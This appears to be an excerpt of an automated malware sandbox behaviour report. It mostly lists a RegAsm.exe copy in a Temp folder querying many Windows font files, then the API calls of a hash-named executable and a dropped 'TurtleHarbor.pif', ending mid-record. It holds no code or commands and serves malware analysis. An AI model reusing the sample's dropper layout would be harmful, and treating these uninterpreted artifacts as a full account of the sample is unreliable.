Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00350030 GetLocalTime,__swprintf,

18_2_00350030

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_00350722 GetUserNameW,

18_2_00350722

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_0034416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

18_2_0034416A

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Code function: 0_2_00405C70 GlobalAlloc,lstrlenW,GetVersionExW,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GlobalFree,lstrcpyW,OpenProcess,CloseHandle,CharUpperW,lstrcmpW,GlobalFree,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,lstrcmpW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,CloseHandle,

0_2_00405C70

Source: C:\Windows\System32\wscript.exe

